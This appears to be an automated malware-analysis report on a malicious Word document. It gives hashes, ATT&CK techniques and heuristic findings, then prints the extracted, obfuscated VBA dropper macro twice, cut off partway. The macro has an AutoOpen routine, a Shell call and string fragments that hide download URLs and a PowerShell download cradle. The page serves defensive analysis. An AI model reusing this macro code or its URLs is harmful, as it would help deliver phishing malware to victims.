Office (OLE) malware analysis — malicious · e152edb2a451a5fc

MALICIOUS

Office (OLE)

212.5 KB Created: 2017-12-13 20:39:00 Authoring application: Microsoft Office Word First seen: 2018-01-23

MD5: f7eabcc92b510c6bfa58f80aae1829a3 SHA-1: b2fe4166446dffcfc5967def53bda3b3d81a990d SHA-256: e152edb2a451a5fce8a44714dad6bd60aa1d0c8995d4b04f4b8ce45f8068d1f7

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes a Shell() call to execute a payload, and the ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure. The obfuscated URL is likely used to download a second-stage payload.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.iWd+iWdmivaiWd+iWdso.cl/iWd+iWdsltYb+tYbiWd+iWdhd1dv/tYb+tYb,hiWd+iWdtFOZQcDG5BTDWf0ho2o In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 285418 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	285418 bytes
SHA-256: `f85f85e117d2a388a24be64a0524fcc718e44841a69327df5fdb368ca508b571`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "qcWWCncUbUDm" Sub AutoOpen() vsUWNwsFYiGAzI = "jXkJZGO" + "zQPsofjpGQ" + "IQdowAQC" + "vwocoOUJTZWn" + "YWFzGEZptAkl" + "oGjoJJE" + "ZAbnDZLaVju" + "bsGiwuMcwB" + "EqoaNZfQNjEwWd" + "CfNOYTqN" + "vzApOwbjXE" + "zPwzAqPjoW" kEosjOhdcOcPfO = "pCQHYbRGNn" + "QNhEJYCBPvAW" + "MwtcIUASj" + "ANQhwSSwbFz" + "UwYFEMiwdpjAuZ" + "pwsnOjmjqtrE" + "wzYQROizECQn" + "kwLhQnYjdAiSk" + "hPhMMIuBf" + "Pifvklvcz" + "wnVJdEfzTzq" + "jwwhWqDftiTvRh" dwrEGSJV = "uXiIdvihaRBjwD" + "EZUjNUZsv" + "BAcskfWbCnzHvC" + "AlVAfYivczjwdI" + "UfnKbuGoql" + "HwPPwdSjMjE" + "QZWEztDhtScST" + "kaCuwfOAQi" + "MDDfuwqPnXl" + "qGvmEko" + "zwctrjRnZd" + "IoZmpABzW" CjzwVMoAsJPb = "iQaJoNiCq" + "HdQQUGmC" + "ShuPiuWTdnhT" + "haqVOqNlsjMXpV" + "wUtFGiJ" + "oBwPRuAPJpI" + "qZwrwpzZwisoYQ" + "JtbMUXtCUS" + "vrsTDihZOWV" + "JRfkhFJ" + "qBXqWhcn" + "wXdYVuIhii" test = bFtqiDNoRwww ' VBA.Shell$ bFtqiDNoRwww, 0 GzBAnqSv = "nMwLLkuTBzWFu" + "SzsinXX" + "CbzAqzW" + "fOjwlka" + "NlzofhIDM" + "jBvLfYRkJVMKtv" + "wRHZvPhYaRCXiX" + "SvorPVHTjI" + "AbEFCrEsjPAi" + "jBcVucAjN" + "CRWBfarzYQOOG" + "UOKTpqGSQX" NslZGIzn = "CofpYRoRcOBUv" + "AfRhtWhk" + "ztSiFYR" + "RbSRfiVu" + "BoqBVnSjlt" + "bERGSojvGjjtK" + "ktcrUww" + "VUsuwdGzzUfc" + "MJLzrCZnoSuf" + "ktprQwsojwOXpC" + "HjOOhZYjRrcuX" + "jBzODtNKHDiksc" zbCzkjFEj = "WMJYznBVoDvQJm" + "bwbLfwjv" + "TQaumTazRQ" + "jDlIPjPEZRhS" + "qIjdsABpR" + "EjNGiVczwsFd" + "KTvwhcVElz" + "EdjwEQPq" + "RjYBZhizU" + "aKMlYKzBTNvi" + "lDCEmftic" + "NGiutZAtX" End Sub Function bFtqiDNoRwww() fHuKBRzl = "cCdkRQMi" + "uDmImvbspJ" + "lbuBZnoflWi" + "wjSFjGBCqp" + "jLSkiIYR" + "vnWAIcLdbjw" + "LfpZTprmnHnwPK" + "GCKXMEEcJMSzH" + "XaJsMYjcLLThfq" + "zZkzmEaRJjvHC" + "MBsjrPhiEDm" + "irwDfYNo" + "nhAVpzIz" BDzNRFLhn = "mVhLwzEaU" + "JMdMtXPGLEqT" + "iQAmUAOtkkzBj" + "hYEwZdosf" + "rOHPlvqYThw" + "wKjaFrZbdLNHhi" + "FQqzqlau" + "tzHoubi" + "QmatOwXwTDwjBz" + "DokHchIJXPdh" + "jlhCdOqv" + "NrSSDXid" + "EtREzKTFR" VFhtFOOh = Mid("jJsR6FErg/QGiWd+iWdOtYb+tYb0E/,httptYb+tYbiWd+iWd://iWd+tYb+tYbiWdfixxoiWd+tYb+tYbiWdo.iWd+iWdintYb+tYb/iWd+iWdpiWd+iWdubliciWd+it'+'Yb+tYbWd/PiWd+iWdRiWd+iWdLm709wAw0JXNQcszkaZUdsZt2OcD", 8, 156) NCRPpviUUJ = "QRdwwJaz" + "aGUVjKcaiSFDW" + "OVZTrOBSYivnVj" + "tpdilmipSAps" + "OpuEtXPbZ" + "jilIhqZtowtpd" + "VlHffGSCWmD" + "kqtwRFUwtAzd" + "zsGAwVZ" + "RjIQjwSX" + "LwFwGiAqioUi" + "UmddjOMBaRdX" + "HkhhICbNo" LuvvEFNN = "UTWwmFdRT" + "ShXrvQiCRMZ" + "HOqwwwFkT" + "TLDCEwQs" + "pOwHYTbYDTCz" + "oGMIFqJjMi" + "MNLotMfm" + "cjzKGScVXB" + "QJvWwpwtZ" + "DdfpvLInfqnQ" + "vEHBBnNoJK" + "pCSorDQlM" + "YGTUKGUisKdAk" ctrujQuI = "YDsJGJR" + "EhiOVnGQELfl" + "bbnbPJzfSDVj" + "EanEGrIkYpjs" + "ubswQhDSw" + "FiqATCmiNij" + "fdAFoczClEjB" + "WmUmodTHw" + "VProimLWKfLv" + "wLtaVtqAz" + "lzPSrZFQahuip" + "nPQZhYWDaXWauC" + "OHhWaGrSUUzFPk" iCZnhMs = Mid("5AG0amPtQoVQH4ov8H (('iEX (((tYb '+'.( q1b'+'eNv:COmspeC[4,24,25]-joiNitYb+tYbWdiWd) ( (iWdQd8friWd+iWdanc = newiWd+iWd-objeiWd+iWdcttY'+'b+tYb'+' SyiWd+iWmZE0mDKZNdO", 19, 137) sYfZMjTqnkM = "SpouGMuuSOAttT" + "baCDiXwnjrjsGQ" + "npRSWBPWfzvdnF" + "RNBmRkbwCc" + "CHCZToiTaL" + "awtMEWDnuKi" + "aSrTzPMs" + "pCzHTFjGz" + "iJpmEsEfEs" + "iIUvbHcVi" + "OSMktuF" + "RXhuqDCljnav" + "IzAHufLrwDlU" BjwizHUAow = "HEERqfJPcckwlR" + "qYkIBAcoaLPw" + "jkDqCcKvpb" + "OOjOHYN" + "XcBBkvdsi" + "dGahofrZt" + "JHqBwjtmTOhBzA" + "siiSuZjjjLV" + "haBWhiRFPm" + "EBBqYPh" + "IaGvzIGwXZa" + "pbJMMSrz" + "fvLGhiQtiK" vVMmAdIn = "QqdBKwwun" + "hnSQtqapuj" + "GSLdzOusT" + "vaZnLHiccw" + "VfSUcORBXOrkw" + "XRYKjECU" + "mMsdhjw" + "RndlntIX" + "crvFEqb" + "opFStrmBijI" + "lkRaCZwUYjYP" + "jcKYuhWRzttq" + "YwrkJMAoOsZUDi" uOuEF = Mid("2OikslwNFCX72X6GONjsWd8huaiWdiSz4Was", 21, 9) WlYEWmljYF = "wjMzbiENb" + "ufpbKdrpiGY" + "EcfupPiqFoOK" + "FOKlhOdY" + "lPWiXAYDDEsQf" + "TjoojlaFRiQE" + "hD ... (truncated)

SHA-256: f85f85e117d2a388a24be64a0524fcc718e44841a69327df5fdb368ca508b571

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "qcWWCncUbUDm"
Sub AutoOpen()
vsUWNwsFYiGAzI = "jXkJZGO" + "zQPsofjpGQ" + "IQdowAQC" + "vwocoOUJTZWn" + "YWFzGEZptAkl" + "oGjoJJE" + "ZAbnDZLaVju" + "bsGiwuMcwB" + "EqoaNZfQNjEwWd" + "CfNOYTqN" + "vzApOwbjXE" + "zPwzAqPjoW"
kEosjOhdcOcPfO = "pCQHYbRGNn" + "QNhEJYCBPvAW" + "MwtcIUASj" + "ANQhwSSwbFz" + "UwYFEMiwdpjAuZ" + "pwsnOjmjqtrE" + "wzYQROizECQn" + "kwLhQnYjdAiSk" + "hPhMMIuBf" + "Pifvklvcz" + "wnVJdEfzTzq" + "jwwhWqDftiTvRh"
dwrEGSJV = "uXiIdvihaRBjwD" + "EZUjNUZsv" + "BAcskfWbCnzHvC" + "AlVAfYivczjwdI" + "UfnKbuGoql" + "HwPPwdSjMjE" + "QZWEztDhtScST" + "kaCuwfOAQi" + "MDDfuwqPnXl" + "qGvmEko" + "zwctrjRnZd" + "IoZmpABzW"
CjzwVMoAsJPb = "iQaJoNiCq" + "HdQQUGmC" + "ShuPiuWTdnhT" + "haqVOqNlsjMXpV" + "wUtFGiJ" + "oBwPRuAPJpI" + "qZwrwpzZwisoYQ" + "JtbMUXtCUS" + "vrsTDihZOWV" + "JRfkhFJ" + "qBXqWhcn" + "wXdYVuIhii"
test = bFtqiDNoRwww
' VBA.Shell$ bFtqiDNoRwww, 0
GzBAnqSv = "nMwLLkuTBzWFu" + "SzsinXX" + "CbzAqzW" + "fOjwlka" + "NlzofhIDM" + "jBvLfYRkJVMKtv" + "wRHZvPhYaRCXiX" + "SvorPVHTjI" + "AbEFCrEsjPAi" + "jBcVucAjN" + "CRWBfarzYQOOG" + "UOKTpqGSQX"
NslZGIzn = "CofpYRoRcOBUv" + "AfRhtWhk" + "ztSiFYR" + "RbSRfiVu" + "BoqBVnSjlt" + "bERGSojvGjjtK" + "ktcrUww" + "VUsuwdGzzUfc" + "MJLzrCZnoSuf" + "ktprQwsojwOXpC" + "HjOOhZYjRrcuX" + "jBzODtNKHDiksc"
zbCzkjFEj = "WMJYznBVoDvQJm" + "bwbLfwjv" + "TQaumTazRQ" + "jDlIPjPEZRhS" + "qIjdsABpR" + "EjNGiVczwsFd" + "KTvwhcVElz" + "EdjwEQPq" + "RjYBZhizU" + "aKMlYKzBTNvi" + "lDCEmftic" + "NGiutZAtX"
End Sub
Function bFtqiDNoRwww()

fHuKBRzl = "cCdkRQMi" + "uDmImvbspJ" + "lbuBZnoflWi" + "wjSFjGBCqp" + "jLSkiIYR" + "vnWAIcLdbjw" + "LfpZTprmnHnwPK" + "GCKXMEEcJMSzH" + "XaJsMYjcLLThfq" + "zZkzmEaRJjvHC" + "MBsjrPhiEDm" + "irwDfYNo" + "nhAVpzIz"
BDzNRFLhn = "mVhLwzEaU" + "JMdMtXPGLEqT" + "iQAmUAOtkkzBj" + "hYEwZdosf" + "rOHPlvqYThw" + "wKjaFrZbdLNHhi" + "FQqzqlau" + "tzHoubi" + "QmatOwXwTDwjBz" + "DokHchIJXPdh" + "jlhCdOqv" + "NrSSDXid" + "EtREzKTFR"
VFhtFOOh = Mid("jJsR6FErg/QGiWd+iWdOtYb+tYb0E/,httptYb+tYbiWd+iWd://iWd+tYb+tYbiWdfixxoiWd+tYb+tYbiWdo.iWd+iWdintYb+tYb/iWd+iWdpiWd+iWdubliciWd+it'+'Yb+tYbWd/PiWd+iWdRiWd+iWdLm709wAw0JXNQcszkaZUdsZt2OcD", 8, 156)
NCRPpviUUJ = "QRdwwJaz" + "aGUVjKcaiSFDW" + "OVZTrOBSYivnVj" + "tpdilmipSAps" + "OpuEtXPbZ" + "jilIhqZtowtpd" + "VlHffGSCWmD" + "kqtwRFUwtAzd" + "zsGAwVZ" + "RjIQjwSX" + "LwFwGiAqioUi" + "UmddjOMBaRdX" + "HkhhICbNo"
LuvvEFNN = "UTWwmFdRT" + "ShXrvQiCRMZ" + "HOqwwwFkT" + "TLDCEwQs" + "pOwHYTbYDTCz" + "oGMIFqJjMi" + "MNLotMfm" + "cjzKGScVXB" + "QJvWwpwtZ" + "DdfpvLInfqnQ" + "vEHBBnNoJK" + "pCSorDQlM" + "YGTUKGUisKdAk"
ctrujQuI = "YDsJGJR" + "EhiOVnGQELfl" + "bbnbPJzfSDVj" + "EanEGrIkYpjs" + "ubswQhDSw" + "FiqATCmiNij" + "fdAFoczClEjB" + "WmUmodTHw" + "VProimLWKfLv" + "wLtaVtqAz" + "lzPSrZFQahuip" + "nPQZhYWDaXWauC" + "OHhWaGrSUUzFPk"
iCZnhMs = Mid("5AG0amPtQoVQH4ov8H (('iEX (((tYb '+'.( q1b'+'eNv:COmspeC[4,24,25]-joiNitYb+tYbWdiWd) ( (iWdQd8friWd+iWdanc = newiWd+iWd-objeiWd+iWdcttY'+'b+tYb'+' SyiWd+iWmZE0mDKZNdO", 19, 137)
sYfZMjTqnkM = "SpouGMuuSOAttT" + "baCDiXwnjrjsGQ" + "npRSWBPWfzvdnF" + "RNBmRkbwCc" + "CHCZToiTaL" + "awtMEWDnuKi" + "aSrTzPMs" + "pCzHTFjGz" + "iJpmEsEfEs" + "iIUvbHcVi" + "OSMktuF" + "RXhuqDCljnav" + "IzAHufLrwDlU"
BjwizHUAow = "HEERqfJPcckwlR" + "qYkIBAcoaLPw" + "jkDqCcKvpb" + "OOjOHYN" + "XcBBkvdsi" + "dGahofrZt" + "JHqBwjtmTOhBzA" + "siiSuZjjjLV" + "haBWhiRFPm" + "EBBqYPh" + "IaGvzIGwXZa" + "pbJMMSrz" + "fvLGhiQtiK"
vVMmAdIn = "QqdBKwwun" + "hnSQtqapuj" + "GSLdzOusT" + "vaZnLHiccw" + "VfSUcORBXOrkw" + "XRYKjECU" + "mMsdhjw" + "RndlntIX" + "crvFEqb" + "opFStrmBijI" + "lkRaCZwUYjYP" + "jcKYuhWRzttq" + "YwrkJMAoOsZUDi"
uOuEF = Mid("2OikslwNFCX72X6GONjsWd8huaiWdiSz4Was", 21, 9)
WlYEWmljYF = "wjMzbiENb" + "ufpbKdrpiGY" + "EcfupPiqFoOK" + "FOKlhOdY" + "lPWiXAYDDEsQf" + "TjoojlaFRiQE" + "hD
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.